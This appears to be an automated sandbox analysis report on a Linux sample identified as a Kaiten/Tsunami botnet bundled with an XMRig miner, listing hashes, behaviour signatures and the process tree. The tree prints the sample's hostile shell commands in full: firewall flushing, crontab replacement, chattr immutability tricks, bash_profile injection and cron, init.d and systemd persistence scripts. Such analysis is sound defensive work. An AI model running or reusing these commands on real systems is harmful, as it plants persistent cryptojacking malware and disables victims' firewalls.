Analysis
-
max time kernel
146s -
max time network
151s -
platform
ubuntu-20.04_amd64 -
resource
ubuntu2004-amd64-20240611-en -
resource tags
-
submitted
26-10-2024 13:10
General
-
Target
2f1854f309c913068700c0c3efec3a84ea48e62393df38bab9c8233053e2b19b
-
Size
7.0MB
-
MD5
c91421f0d68095890b50a034dbf9d060
-
SHA1
624e0d9c94309de8d038b2e21cf07685d2020fdb
-
SHA256
2f1854f309c913068700c0c3efec3a84ea48e62393df38bab9c8233053e2b19b
-
SHA512
63d174cf0ba590aa836a9c4490ef7982d7590d8fcf9f67b8a8021dc23755a4aecf16805a12679e566d6d6bec45a4d3344d62197a7f3c6660c46812594888bd88
-
SSDEEP
49152:FdvgYnvuqgrb/TGvO90dL3BmAFd4A64nsfJYgJi1QjpzkpDKzBzQgQHDSZ/+/A5X:YqpgxDFnEqZJvlNiPt9y7LxXk5prrT
Score
10/10
Malware Config
Signatures
-
Detects Kaiten/Tsunami Payload 13 IoCs
-
Detects Kaiten/Tsunami payload 13 IoCs
-
Kaiten family
-
Kaiten/Tsunami
Linux-based IoT botnet which is controlled through IRC and normally used to carry out DDoS attacks.
-
Xmrig family
-
xmrig
XMRig is a high performance, open source, cross platform CPU/GPU miner.
-
XMRig Miner payload 26 IoCs
-
File and Directory Permissions Modification 1 TTPs 39 IoCs
Adversaries may modify file or directory permissions to evade defenses.
-
Executes dropped EXE 40 IoCs
-
Flushes firewall rules 1 TTPs 15 IoCs
Flushes/ disables firewall rules inside the Linux kernel.
-
Loads a kernel module 1 IoCs
Loads a Linux kernel module, potentially to achieve persistence
-
Reads EFI boot settings 1 TTPs 64 IoCs
Reads EFI boot settings from the efivars filesystem, may contain security secrets or sensitive data.
-
Attempts to change immutable files 64 IoCs
Modifies inode attributes on the filesystem to allow changing of immutable files.
-
Checks hardware identifiers (DMI) 1 TTPs 64 IoCs
Checks DMI information which indicate if the system is a virtual machine.
-
Creates/modifies Cron job 1 TTPs 64 IoCs
Cron allows running tasks on a schedule, and is commonly used for malware persistence.
-
Enumerates running processes
Discovers information about currently running processes on the system
-
Modifies init.d 2 TTPs 27 IoCs
Adds/modifies system service, likely for persistence.
-
Modifies systemd 2 TTPs 27 IoCs
Adds/ modifies systemd service files. Likely to achieve persistence.
-
Reads hardware information 1 TTPs 64 IoCs
Accesses system info like serial numbers, manufacturer names etc.
-
Writes file to system bin folder 53 IoCs
-
Security Software Discovery 1 TTPs 26 IoCs
Adversaries may attempt to discover installed security software and its configurations.
-
UPX packed file 3 IoCs
Detects executables packed with UPX/modified UPX open source packer.
-
Checks CPU configuration 1 TTPs 64 IoCs
Checks CPU information which indicate if the system is a virtual machine.
-
Reads CPU attributes 1 TTPs 64 IoCs
-
Enumerates kernel/hardware configuration 1 TTPs 64 IoCs
Reads contents of /sys virtual filesystem to enumerate system information.
-
Process Discovery 1 TTPs 26 IoCs
Adversaries may try to discover information about running processes.
-
Reads runtime system information 64 IoCs
Reads data from /proc virtual filesystem.
-
System Network Configuration Discovery 1 TTPs 5 IoCs
Adversaries may gather information about the network configuration of a system.
-
Writes file to shm directory 1 IoCs
Malware can drop malicious files in the shm directory which will run directly from RAM.
-
Writes file to tmp directory 42 IoCs
Malware often drops required files in the /tmp directory.
Processes
-
/tmp/2f1854f309c913068700c0c3efec3a84ea48e62393df38bab9c8233053e2b19b/tmp/2f1854f309c913068700c0c3efec3a84ea48e62393df38bab9c8233053e2b19b1⤵
- Creates/modifies Cron job
- Modifies init.d
- Modifies systemd
- Writes file to system bin folder
- Writes file to shm directory
- Writes file to tmp directory
-
/usr/bin/bashbash -c "ufw disable"2⤵
-
-
/usr/sbin/ufwufw disable2⤵
- Flushes firewall rules
-
/usr/sbin/iptables/usr/sbin/iptables -V3⤵
-
-
/lib/ufw/ufw-init/lib/ufw/ufw-init force-stop3⤵
-
/sbin/ip6tablesip6tables -L INPUT -n4⤵
-
/sbin/modprobe/sbin/modprobe ip6_tables5⤵
- Loads a kernel module
- Enumerates kernel/hardware configuration
- System Network Configuration Discovery
-
-
-
/sbin/iptablesiptables -F ufw-logging-deny4⤵
-
-
/sbin/iptablesiptables -F ufw-logging-allow4⤵
-
-
/sbin/iptablesiptables -F ufw-not-local4⤵
-
-
/sbin/iptablesiptables -F ufw-user-logging-input4⤵
-
-
/sbin/iptablesiptables -F ufw-user-limit-accept4⤵
-
-
/sbin/iptablesiptables -F ufw-user-limit4⤵
-
-
/sbin/iptablesiptables -F ufw-skip-to-policy-input4⤵
-
-
/sbin/iptablesiptables -F ufw-reject-input4⤵
-
-
/sbin/iptablesiptables -F ufw-after-logging-input4⤵
-
-
/sbin/iptablesiptables -F ufw-after-input4⤵
-
-
/sbin/iptablesiptables -F ufw-user-input4⤵
-
-
/sbin/iptablesiptables -F ufw-before-input4⤵
-
-
/sbin/iptablesiptables -F ufw-before-logging-input4⤵
-
-
/sbin/iptablesiptables -F ufw-skip-to-policy-forward4⤵
-
-
/sbin/iptablesiptables -F ufw-reject-forward4⤵
-
-
/sbin/iptablesiptables -F ufw-after-logging-forward4⤵
-
-
/sbin/iptablesiptables -F ufw-after-forward4⤵
-
-
/sbin/iptablesiptables -F ufw-user-logging-forward4⤵
-
-
/sbin/iptablesiptables -F ufw-user-forward4⤵
-
-
/sbin/iptablesiptables -F ufw-before-forward4⤵
-
-
/sbin/iptablesiptables -F ufw-before-logging-forward4⤵
-
-
/sbin/iptablesiptables -F ufw-track-forward4⤵
-
-
/sbin/iptablesiptables -F ufw-track-output4⤵
-
-
/sbin/iptablesiptables -F ufw-track-input4⤵
-
-
/sbin/iptablesiptables -F ufw-skip-to-policy-output4⤵
-
-
/sbin/iptablesiptables -F ufw-reject-output4⤵
-
-
/sbin/iptablesiptables -F ufw-after-logging-output4⤵
-
-
/sbin/iptablesiptables -F ufw-after-output4⤵
-
-
/sbin/iptablesiptables -F ufw-user-logging-output4⤵
-
-
/sbin/iptablesiptables -F ufw-user-output4⤵
-
-
/sbin/iptablesiptables -F ufw-before-output4⤵
-
-
/sbin/iptablesiptables -F ufw-before-logging-output4⤵
-
-
/sbin/iptablesiptables -Z ufw-logging-deny4⤵
-
-
/sbin/iptablesiptables -Z ufw-logging-allow4⤵
-
-
/sbin/iptablesiptables -Z ufw-not-local4⤵
-
-
/sbin/iptablesiptables -Z ufw-user-logging-input4⤵
-
-
/sbin/iptablesiptables -Z ufw-user-limit-accept4⤵
-
-
/sbin/iptablesiptables -Z ufw-user-limit4⤵
-
-
/sbin/iptablesiptables -Z ufw-skip-to-policy-input4⤵
-
-
/sbin/iptablesiptables -Z ufw-reject-input4⤵
-
-
/sbin/iptablesiptables -Z ufw-after-logging-input4⤵
-
-
/sbin/iptablesiptables -Z ufw-after-input4⤵
-
-
/sbin/iptablesiptables -Z ufw-user-input4⤵
-
-
/sbin/iptablesiptables -Z ufw-before-input4⤵
-
-
/sbin/iptablesiptables -Z ufw-before-logging-input4⤵
-
-
/sbin/iptablesiptables -Z ufw-skip-to-policy-forward4⤵
-
-
/sbin/iptablesiptables -Z ufw-reject-forward4⤵
-
-
/sbin/iptablesiptables -Z ufw-after-logging-forward4⤵
-
-
/sbin/iptablesiptables -Z ufw-after-forward4⤵
-
-
/sbin/iptablesiptables -Z ufw-user-logging-forward4⤵
-
-
/sbin/iptablesiptables -Z ufw-user-forward4⤵
-
-
/sbin/iptablesiptables -Z ufw-before-forward4⤵
-
-
/sbin/iptablesiptables -Z ufw-before-logging-forward4⤵
-
-
/sbin/iptablesiptables -Z ufw-track-forward4⤵
-
-
/sbin/iptablesiptables -Z ufw-track-output4⤵
-
-
/sbin/iptablesiptables -Z ufw-track-input4⤵
-
-
/sbin/iptablesiptables -Z ufw-skip-to-policy-output4⤵
-
-
/sbin/iptablesiptables -Z ufw-reject-output4⤵
-
-
/sbin/iptablesiptables -Z ufw-after-logging-output4⤵
-
-
/sbin/iptablesiptables -Z ufw-after-output4⤵
-
-
/sbin/iptablesiptables -Z ufw-user-logging-output4⤵
-
-
/sbin/iptablesiptables -Z ufw-user-output4⤵
-
-
/sbin/iptablesiptables -Z ufw-before-output4⤵
-
-
/sbin/iptablesiptables -Z ufw-before-logging-output4⤵
-
-
/sbin/iptablesiptables -X ufw-logging-deny4⤵
-
-
/sbin/iptablesiptables -X ufw-logging-allow4⤵
-
-
/sbin/iptablesiptables -X ufw-not-local4⤵
-
-
/sbin/iptablesiptables -X ufw-user-logging-input4⤵
-
-
/sbin/iptablesiptables -X ufw-user-logging-output4⤵
-
-
/sbin/iptablesiptables -X ufw-user-logging-forward4⤵
-
-
/sbin/iptablesiptables -X ufw-user-limit-accept4⤵
-
-
/sbin/iptablesiptables -X ufw-user-limit4⤵
-
-
/sbin/iptablesiptables -X ufw-user-input4⤵
-
-
/sbin/iptablesiptables -X ufw-user-forward4⤵
-
-
/sbin/iptablesiptables -X ufw-user-output4⤵
-
-
/sbin/iptablesiptables -X ufw-skip-to-policy-input4⤵
-
-
/sbin/iptablesiptables -X ufw-skip-to-policy-output4⤵
-
-
/sbin/iptablesiptables -X ufw-skip-to-policy-forward4⤵
-
-
/sbin/iptablesiptables -P INPUT ACCEPT4⤵
-
-
/sbin/iptablesiptables -P OUTPUT ACCEPT4⤵
-
-
/sbin/iptablesiptables -P FORWARD ACCEPT4⤵
-
-
/sbin/ip6tablesip6tables -F ufw6-logging-deny4⤵
-
-
/sbin/ip6tablesip6tables -F ufw6-logging-allow4⤵
-
-
/sbin/ip6tablesip6tables -F ufw6-not-local4⤵
-
-
/sbin/ip6tablesip6tables -F ufw6-user-logging-input4⤵
-
-
/sbin/ip6tablesip6tables -F ufw6-user-limit-accept4⤵
-
-
/sbin/ip6tablesip6tables -F ufw6-user-limit4⤵
-
-
/sbin/ip6tablesip6tables -F ufw6-skip-to-policy-input4⤵
-
-
/sbin/ip6tablesip6tables -F ufw6-reject-input4⤵
-
-
/sbin/ip6tablesip6tables -F ufw6-after-logging-input4⤵
-
-
/sbin/ip6tablesip6tables -F ufw6-after-input4⤵
-
-
/sbin/ip6tablesip6tables -F ufw6-user-input4⤵
-
-
/sbin/ip6tablesip6tables -F ufw6-before-input4⤵
-
-
/sbin/ip6tablesip6tables -F ufw6-before-logging-input4⤵
-
-
/sbin/ip6tablesip6tables -F ufw6-skip-to-policy-forward4⤵
-
-
/sbin/ip6tablesip6tables -F ufw6-reject-forward4⤵
-
-
/sbin/ip6tablesip6tables -F ufw6-after-logging-forward4⤵
-
-
/sbin/ip6tablesip6tables -F ufw6-after-forward4⤵
-
-
/sbin/ip6tablesip6tables -F ufw6-user-logging-forward4⤵
-
-
/sbin/ip6tablesip6tables -F ufw6-user-forward4⤵
-
-
/sbin/ip6tablesip6tables -F ufw6-before-forward4⤵
-
-
/sbin/ip6tablesip6tables -F ufw6-before-logging-forward4⤵
-
-
/sbin/ip6tablesip6tables -F ufw6-track-forward4⤵
-
-
/sbin/ip6tablesip6tables -F ufw6-track-output4⤵
-
-
/sbin/ip6tablesip6tables -F ufw6-track-input4⤵
-
-
/sbin/ip6tablesip6tables -F ufw6-skip-to-policy-output4⤵
-
-
/sbin/ip6tablesip6tables -F ufw6-reject-output4⤵
-
-
/sbin/ip6tablesip6tables -F ufw6-after-logging-output4⤵
-
-
/sbin/ip6tablesip6tables -F ufw6-after-output4⤵
-
-
/sbin/ip6tablesip6tables -F ufw6-user-logging-output4⤵
-
-
/sbin/ip6tablesip6tables -F ufw6-user-output4⤵
-
-
/sbin/ip6tablesip6tables -F ufw6-before-output4⤵
-
-
/sbin/ip6tablesip6tables -F ufw6-before-logging-output4⤵
-
-
/sbin/ip6tablesip6tables -Z ufw6-logging-deny4⤵
-
-
/sbin/ip6tablesip6tables -Z ufw6-logging-allow4⤵
-
-
/sbin/ip6tablesip6tables -Z ufw6-not-local4⤵
-
-
/sbin/ip6tablesip6tables -Z ufw6-user-logging-input4⤵
-
-
/sbin/ip6tablesip6tables -Z ufw6-user-limit-accept4⤵
-
-
/sbin/ip6tablesip6tables -Z ufw6-user-limit4⤵
-
-
/sbin/ip6tablesip6tables -Z ufw6-skip-to-policy-input4⤵
-
-
/sbin/ip6tablesip6tables -Z ufw6-reject-input4⤵
-
-
/sbin/ip6tablesip6tables -Z ufw6-after-logging-input4⤵
-
-
/sbin/ip6tablesip6tables -Z ufw6-after-input4⤵
-
-
/sbin/ip6tablesip6tables -Z ufw6-user-input4⤵
-
-
/sbin/ip6tablesip6tables -Z ufw6-before-input4⤵
-
-
/sbin/ip6tablesip6tables -Z ufw6-before-logging-input4⤵
-
-
/sbin/ip6tablesip6tables -Z ufw6-skip-to-policy-forward4⤵
-
-
/sbin/ip6tablesip6tables -Z ufw6-reject-forward4⤵
-
-
/sbin/ip6tablesip6tables -Z ufw6-after-logging-forward4⤵
-
-
/sbin/ip6tablesip6tables -Z ufw6-after-forward4⤵
-
-
/sbin/ip6tablesip6tables -Z ufw6-user-logging-forward4⤵
-
-
/sbin/ip6tablesip6tables -Z ufw6-user-forward4⤵
-
-
/sbin/ip6tablesip6tables -Z ufw6-before-forward4⤵
-
-
/sbin/ip6tablesip6tables -Z ufw6-before-logging-forward4⤵
-
-
/sbin/ip6tablesip6tables -Z ufw6-track-forward4⤵
-
-
/sbin/ip6tablesip6tables -Z ufw6-track-output4⤵
-
-
/sbin/ip6tablesip6tables -Z ufw6-track-input4⤵
-
-
/sbin/ip6tablesip6tables -Z ufw6-skip-to-policy-output4⤵
-
-
/sbin/ip6tablesip6tables -Z ufw6-reject-output4⤵
-
-
/sbin/ip6tablesip6tables -Z ufw6-after-logging-output4⤵
-
-
/sbin/ip6tablesip6tables -Z ufw6-after-output4⤵
-
-
/sbin/ip6tablesip6tables -Z ufw6-user-logging-output4⤵
-
-
/sbin/ip6tablesip6tables -Z ufw6-user-output4⤵
-
-
/sbin/ip6tablesip6tables -Z ufw6-before-output4⤵
-
-
/sbin/ip6tablesip6tables -Z ufw6-before-logging-output4⤵
-
-
/sbin/ip6tablesip6tables -X ufw6-logging-deny4⤵
-
-
/sbin/ip6tablesip6tables -X ufw6-logging-allow4⤵
-
-
/sbin/ip6tablesip6tables -X ufw6-not-local4⤵
-
-
/sbin/ip6tablesip6tables -X ufw6-user-logging-input4⤵
-
-
/sbin/ip6tablesip6tables -X ufw6-user-logging-output4⤵
-
-
/sbin/ip6tablesip6tables -X ufw6-user-logging-forward4⤵
-
-
/sbin/ip6tablesip6tables -X ufw6-user-limit-accept4⤵
-
-
/sbin/ip6tablesip6tables -X ufw6-user-limit4⤵
-
-
/sbin/ip6tablesip6tables -X ufw6-user-input4⤵
-
-
/sbin/ip6tablesip6tables -X ufw6-user-forward4⤵
-
-
/sbin/ip6tablesip6tables -X ufw6-user-output4⤵
-
-
/sbin/ip6tablesip6tables -X ufw6-skip-to-policy-input4⤵
-
-
/sbin/ip6tablesip6tables -X ufw6-skip-to-policy-output4⤵
-
-
/sbin/ip6tablesip6tables -X ufw6-skip-to-policy-forward4⤵
-
-
/sbin/ip6tablesip6tables -P INPUT ACCEPT4⤵
-
-
/sbin/ip6tablesip6tables -P OUTPUT ACCEPT4⤵
-
-
/sbin/ip6tablesip6tables -P FORWARD ACCEPT4⤵
-
-
-
-
/usr/bin/bashbash -c "iptables -P INPUT ACCEPT"2⤵
- System Network Configuration Discovery
-
-
/usr/sbin/iptablesiptables -P INPUT ACCEPT2⤵
-
-
/usr/bin/bashbash -c "iptables -P OUTPUT ACCEPT"2⤵
- System Network Configuration Discovery
-
-
/usr/sbin/iptablesiptables -P OUTPUT ACCEPT2⤵
-
-
/usr/bin/bashbash -c "iptables -P FORWARD ACCEPT"2⤵
- System Network Configuration Discovery
-
-
/usr/sbin/iptablesiptables -P FORWARD ACCEPT2⤵
-
-
/usr/bin/bashbash -c "iptables -F"2⤵
- System Network Configuration Discovery
-
-
/usr/sbin/iptablesiptables -F2⤵
- Flushes firewall rules
-
-
/usr/bin/bashbash -c "chattr -ia /etc/ld.so.preload"2⤵
-
-
/usr/bin/chattrchattr -ia /etc/ld.so.preload2⤵
- Attempts to change immutable files
-
-
/usr/bin/pgreppgrep -f klibsystem42⤵
-
-
/usr/bin/pgreppgrep -f klibsystem52⤵
- Reads CPU attributes
- Reads runtime system information
-
-
/usr/bin/chattrchattr +ia /etc/init.d/knlib2⤵
- Attempts to change immutable files
-
-
/etc/init.d/knlib/etc/init.d/knlib start2⤵
- Executes dropped EXE
-
/usr/bin/cpcp -f -r -- /bin/knlib5 /bin/klibsystem53⤵
-
-
/usr/bin/rmrm -rf -- klibsystem53⤵
-
-
-
/usr/bin/chattrchattr +ia /etc/systemd/system/knlibe.service2⤵
-
-
/usr/bin/systemctlsystemctl daemon-reload2⤵
-
-
/usr/bin/systemctlsystemctl enable knlibe.service2⤵
- Reads EFI boot settings
-
-
/usr/bin/chattrchattr +ia /bin/knlib52⤵
-
-
/usr/bin/crontabcrontab -r2⤵
-
-
/usr/bin/pkillpkill -f .klibsystem52⤵
- Reads CPU attributes
- Reads runtime system information
-
-
/usr/bin/pkillpkill -f .klibsystem42⤵
- Reads runtime system information
-
-
/usr/bin/bashbash -c "echo \"* * * * * /var/tmp/.klibsystem5 >/dev/null 2>&1\" | crontab -"2⤵
-
/usr/bin/crontabcrontab -3⤵
-
-
-
/usr/bin/chattrchattr +ia /etc/cron.d/.lib-knlib42⤵
-
-
/usr/bin/chattrchattr +ia /var/spool/cron/.lib-knlib42⤵
-
-
/usr/bin/chattrchattr +ia /etc/cron.hourly/.lib-knlib42⤵
-
-
/usr/bin/chattrchattr +ia /etc/cron.daily/.lib-knlib42⤵
-
-
/usr/bin/chattrchattr +ia /etc/cron.weekly/.lib-knlib42⤵
-
-
/usr/bin/chattrchattr +ia /etc/cron.monthly/.lib-knlib42⤵
-
-
/usr/bin/chattrchattr -ia /etc/anacrontab2⤵
-
-
/usr/bin/chattrchattr +ia /etc/anacrontab2⤵
-
-
/tmp/service-agent/tmp/service-agent -c -p 80 -p 8080 -p 443 -tls -dp 80 -dp 8080 -dp 443 -tls -d -pwn2⤵
- Executes dropped EXE
- Checks hardware identifiers (DMI)
- Reads hardware information
- Checks CPU configuration
- Reads CPU attributes
- Enumerates kernel/hardware configuration
-
/bin/shsh -c "echo \"[\$(hostname=\$(hostname -I 2>/dev/null || hostname -i 2>/dev/null);echo \$hostname | awk {'print \$1'} 2>/dev/null)\$(cat /etc/ssh/sshd_config 2>/dev/null | grep 'Port ' 2>/dev/null | head -n 1 2>/dev/null | awk {'print \"-\"\$2'} 2>/dev/null)][\$(whoami 2>/dev/null)][\$(hostname 2>/dev/null)][\$(grep -c ^processor /proc/cpuinfo 2>/dev/null)][\$(X=\$(grep -m 1 'model name' /proc/cpuinfo 2>/dev/null | cut -d: -f2 2>/dev/null | sed -e 's/^ *//' 2>/dev/null | sed -e 's/\$//' 2>/dev/null); if [ \$(echo \$X 2>/dev/null | awk {'print \$1'} 2>/dev/null) = 'QEMU' ]; then echo 'QEMU'; elif [ \$(echo \$X 2>/dev/null | awk {'print \$4'} 2>/dev/null) = '(Haswell)' ]; then echo 'Haswell'; elif [ \$(echo \$X 2>/dev/null | awk {'print \$4'} 2>/dev/null) = '(Broadwell)' ]; then echo 'Broadwell'; elif [ \$(echo \$X 2>/dev/null | awk {'print \$3'} 2>/dev/null) = 'CPU' ]; then echo \$X 2>/dev/null | awk {'print \$4'} 2>/dev/null; elif [ \$(echo \$X 2>/dev/null | awk {'print \$4'} 2>/dev/null) = 'CPU' ]; then echo \$X 2>/dev/null | awk {'print \$3'} 2>/dev/null; elif [ \$(echo \$X 2>/dev/null | awk {'print \$1'} 2>/dev/null) = 'AMD' ]; then echo \$X 2>/dev/null | awk {'print \$2\" \"\$3\" \"\$4'} 2>/dev/null; else echo \$X 2>/dev/null; fi)]\""3⤵
-
/usr/bin/hostnamehostname -I4⤵
-
-
/usr/bin/awkawk "{print \$1}"4⤵
-
-
/usr/bin/awkawk "{print \"-\"\$2}"4⤵
-
-
/usr/bin/headhead -n 14⤵
-
-
/usr/bin/grepgrep "Port "4⤵
-
-
/usr/bin/catcat /etc/ssh/sshd_config4⤵
-
-
/usr/bin/whoamiwhoami4⤵
-
-
/usr/bin/hostnamehostname4⤵
-
-
/usr/bin/grepgrep -c "^processor" /proc/cpuinfo4⤵
- Checks CPU configuration
-
-
/usr/bin/sedsed -e "s/\$//"4⤵
-
-
/usr/bin/sedsed -e "s/^ *//"4⤵
-
-
/usr/bin/cutcut -d: -f24⤵
-
-
/usr/bin/grepgrep -m 1 "model name" /proc/cpuinfo4⤵
- Checks CPU configuration
-
-
/usr/bin/awkawk "{print \$1}"4⤵
-
-
/usr/bin/awkawk "{print \$4}"4⤵
-
-
/usr/bin/awkawk "{print \$4}"4⤵
-
-
-
/bin/shsh -c "ps -A -ostat,ppid 2>/dev/null | awk '/[zZ]/ && !a[\$2]++ {print \$2}' 2>/dev/null | while read procid; do kill -9 \$procid 2>/dev/null; done;if [ `id -u 2>/dev/null` -eq '0' ]; then ps x 2>/dev/null | grep /etc/cron 2>/dev/null | grep -v grep 2>/dev/null | while read procid; do kill -9 \$procid 2>/dev/null; done fi"3⤵
-
/usr/bin/awkawk "/[zZ]/ && !a[\$2]++ {print \$2}"4⤵
-
-
/usr/bin/psps -A "-ostat,ppid"4⤵
- Reads runtime system information
-
-
/usr/bin/idid -u4⤵
-
-
/usr/bin/grepgrep -v grep4⤵
-
-
/usr/bin/grepgrep /etc/cron4⤵
-
-
/usr/bin/psps x4⤵
- Reads CPU attributes
- Reads runtime system information
-
-
-
/bin/shsh -c "if [ `id -u 2>/dev/null` -eq '0' ]; then SNIFFDIR='/bin';PWNDIR='/bin'; else rm -rf /tmp/.pwn 2>/dev/null;mkdir /tmp/.pwn 2>/dev/null;SNIFFDIR='/tmp/.pwn';PWNDIR='/tmp';fi;PWNRIG='pwnrig';PWNRIGE='pwnrige';PWNRIGL='pwnrigl';CROND='crondr';SYSD='sysdr';INITD='initdr';BPROFILE='bprofr';MINER='/tmp/service-agent';PROGRAM='-bash';if [ `id -u 2>/dev/null` -eq '0' ]; then chattr -i -a \$SNIFFDIR/\$BPROFILE ~/.bash_profile >/dev/null 2>&1;fi;rm -rf \$SNIFFDIR/\$BPROFILE 2>/dev/null;sed -i \"/\$BPROFILE/d\" ~/.bash_profile 2>/dev/null;cp -f -r -- \$MINER \$SNIFFDIR/\$BPROFILE 2>/dev/null;echo \"cp -f -r -- \$SNIFFDIR/\$BPROFILE \$PWNDIR/\$PROGRAM 2>/dev/null && \$PWNDIR/\$PROGRAM -c -p 80 -p 8080 -p 443 -tls -dp 80 -dp 8080 -dp 443 -tls -d >/dev/null 2>&1 && rm -rf -- \$PWNDIR/\$PROGRAM 2>/dev/null\" >> ~/.bash_profile 2>/dev/null;if [ `id -u 2>/dev/null` -eq '0' ]; then chattr +i +a \$SNIFFDIR/\$BPROFILE ~/.bash_profile >/dev/null 2>&1;mkdir -p /etc/cron.d /etc/cron.daily /etc/cron.hourly /etc/cron.monthly /etc/cron.weekly 2>/dev/null;chattr -i -a /etc/cron.*/\$PWNRIG \$SNIFFDIR/\$CROND >/dev/null 2>&1;rm -rf \$SNIFFDIR/\$CROND 2>/dev/null;cp -f -r -- \$MINER \$SNIFFDIR/\$CROND 2>/dev/null;echo -e \"#!/bin/bash\\ncp -f -r -- \$SNIFFDIR/\$CROND \$PWNDIR/\$PROGRAM 2>/dev/null\\ncd \$PWNDIR 2>/dev/null\\n./\$PROGRAM -c -p 80 -p 8080 -p 443 -tls -dp 80 -dp 8080 -dp 443 -tls -d >/dev/null 2>&1\\nrm -rf -- \$PROGRAM 2>/dev/null\\n\" | tee /etc/cron.d/\$PWNRIG /etc/cron.daily/\$PWNRIG /etc/cron.hourly/\$PWNRIG /etc/cron.monthly/\$PWNRIG /etc/cron.weekly/\$PWNRIG > /dev/null;sed -i '1 s/-e //' /etc/cron.*/\$PWNRIG 2>/dev/null;chmod +x /etc/cron.*/\$PWNRIG \$SNIFFDIR/\$CROND 2>/dev/null;chattr +i +a /etc/cron.*/\$PWNRIG \$SNIFFDIR/\$CROND >/dev/null 2>&1;if which chkconfig > /dev/null 2>&1; then chattr -i -a /etc/init.d/\$PWNRIG \$SNIFFDIR/\$INITD >/dev/null 2>&1;chkconfig \$PWNRIG off 2>/dev/null;chkconfig --del \$PWNRIG 2>/dev/null;rm -rf \$SNIFFDIR/\$INITD 2>/dev/null;cp -f -r -- \$MINER \$SNIFFDIR/\$INITD 2>/dev/null;echo -e \"#!/bin/bash\\n#\\n# \$PWNRIG Start/Stop the \$PWNRIG clock daemon.\\n#\\n# chkconfig: 2345 90 60\\n# description: \$PWNRIG (by pwned)\\ncp -f -r -- \$SNIFFDIR/\$INITD \$PWNDIR/\$PROGRAM 2>/dev/null\\ncd \$PWNDIR 2>/dev/null\\n./\$PROGRAM -c -p 80 -p 8080 -p 443 -tls -dp 80 -dp 8080 -dp 443 -tls -d 2>/dev/null\\nrm -rf -- \$PROGRAM 2>/dev/null\\n\" | tee /etc/init.d/\$PWNRIG > /dev/null;sed -i '1 s/-e //' /etc/init.d/\$PWNRIG 2>/dev/null;chmod +x /etc/init.d/\$PWNRIG \$SNIFFDIR/\$INITD 2>/dev/null;chkconfig --add \$PWNRIG 2>/dev/null;chkconfig \$PWNRIG on 2>/dev/null;chattr +i +a /etc/init.d/\$PWNRIG \$SNIFFDIR/\$INITD >/dev/null 2>&1;fi;if which update-rc.d > /dev/null 2>&1; then chattr -i -a /etc/init.d/\$PWNRIG \$SNIFFDIR/\$INITD >/dev/null 2>&1;update-rc.d -f \$PWNRIG disable >/dev/null 2>&1;update-rc.d -f \$PWNRIG remove >/dev/null 2>&1;rm -rf \$SNIFFDIR/\$INITD 2>/dev/null;cp -f -r -- \$MINER \$SNIFFDIR/\$INITD 2>/dev/null;echo -e \"#!/bin/bash\\n### BEGIN INIT INFO\\n# Provides: \$PWNRIG\\n# Required-Start: \$all\\n# Required-Stop:\\n# Default-Start: 2 3 4 5\\n# Default-Stop:\\n# Short-Description: \$PWNRIG (by pwned)\\n### END INIT INFO\\ncp -f -r -- \$SNIFFDIR/\$INITD \$PWNDIR/\$PROGRAM 2>/dev/null\\ncd \$PWNDIR 2>/dev/null\\n./\$PROGRAM -c -p 80 -p 8080 -p 443 -tls -dp 80 -dp 8080 -dp 443 -tls -d 2>/dev/null\\nrm -rf -- \$PROGRAM 2>/dev/null\\n\" | tee /etc/init.d/\$PWNRIG > /dev/null;sed -i '1 s/-e //' /etc/init.d/\$PWNRIG 2>/dev/null;chmod +x /etc/init.d/\$PWNRIG \$SNIFFDIR/\$INITD 2>/dev/null;update-rc.d \$PWNRIG defaults >/dev/null 2>&1;update-rc.d \$PWNRIG enable >/dev/null 2>&1;chattr +i +a /etc/init.d/\$PWNRIG \$SNIFFDIR/\$INITD >/dev/null 2>&1;fi;if which systemctl > /dev/null 2>&1; then chattr -i -a /lib/systemd/system/\$PWNRIGL.service /etc/systemd/system/\$PWNRIGE.service \$SNIFFDIR/\$SYSD >/dev/null 2>&1;rm -rf \$SNIFFDIR/\$SYSD 2>/dev/null;cp -f -r -- \$MINER \$SNIFFDIR/\$SYSD 2>/dev/null;echo -e \"[Unit]\\nDescription=\$PWNRIG\\n\\nWants=network.target\\nAfter=syslog.target network-online.target\\n\\n[Service]\\nType=forking\\nExecStart=/bin/bash -c 'cp -f -r -- \$SNIFFDIR/\$SYSD \$PWNDIR/\$PROGRAM 2>/dev/null && \$PWNDIR/\$PROGRAM -c -p 80 -p 8080 -p 443 -tls -dp 80 -dp 8080 -dp 443 -tls -d >/dev/null 2>&1 && rm -rf -- \$PWNDIR/\$PROGRAM 2>/dev/null'\\nRestart=always\\nKillMode=process\\n\\n[Install]\\nWantedBy=multi-user.target\" | tee /lib/systemd/system/\$PWNRIGL.service /etc/systemd/system/\$PWNRIGE.service >/dev/null;sed -i '1 s/-e //' /lib/systemd/system/\$PWNRIGL.service /etc/systemd/system/\$PWNRIGE.service 2>/dev/null;chattr +i +a /lib/systemd/system/\$PWNRIGL.service /etc/systemd/system/\$PWNRIGE.service \$SNIFFDIR/\$SYSD >/dev/null 2>&1;systemctl enable \$PWNRIGE.service 2> /dev/null;systemctl enable \$PWNRIGL.service 2> /dev/null;systemctl daemon-reload 2> /dev/null;systemctl reload-or-restart \$PWNRIGE.service 2> /dev/null;systemctl reload-or-restart \$PWNRIGL.service 2> /dev/null;fi;fi"3⤵
- File and Directory Permissions Modification
- Writes file to tmp directory
-
/usr/bin/idid -u4⤵
-
-
/usr/bin/idid -u4⤵
-
-
/usr/bin/chattrchattr -i -a /bin/bprofr "~/.bash_profile"4⤵
-
-
/usr/bin/rmrm -rf /bin/bprofr4⤵
-
-
/usr/bin/sedsed -i /bprofr/d "~/.bash_profile"4⤵
-
-
/usr/bin/cpcp -f -r -- /tmp/service-agent /bin/bprofr4⤵
- Writes file to system bin folder
-
-
/usr/bin/idid -u4⤵
-
-
/usr/bin/chattrchattr +i +a /bin/bprofr "~/.bash_profile"4⤵
-
-
/usr/bin/mkdirmkdir -p /etc/cron.d /etc/cron.daily /etc/cron.hourly /etc/cron.monthly /etc/cron.weekly4⤵
-
-
/usr/bin/chattrchattr -i -a "/etc/cron.*/pwnrig" /bin/crondr4⤵
-
-
/usr/bin/rmrm -rf /bin/crondr4⤵
-
-
/usr/bin/cpcp -f -r -- /tmp/service-agent /bin/crondr4⤵
- Writes file to system bin folder
-
-
/usr/bin/teetee /etc/cron.d/pwnrig /etc/cron.daily/pwnrig /etc/cron.hourly/pwnrig /etc/cron.monthly/pwnrig /etc/cron.weekly/pwnrig4⤵
- Creates/modifies Cron job
-
-
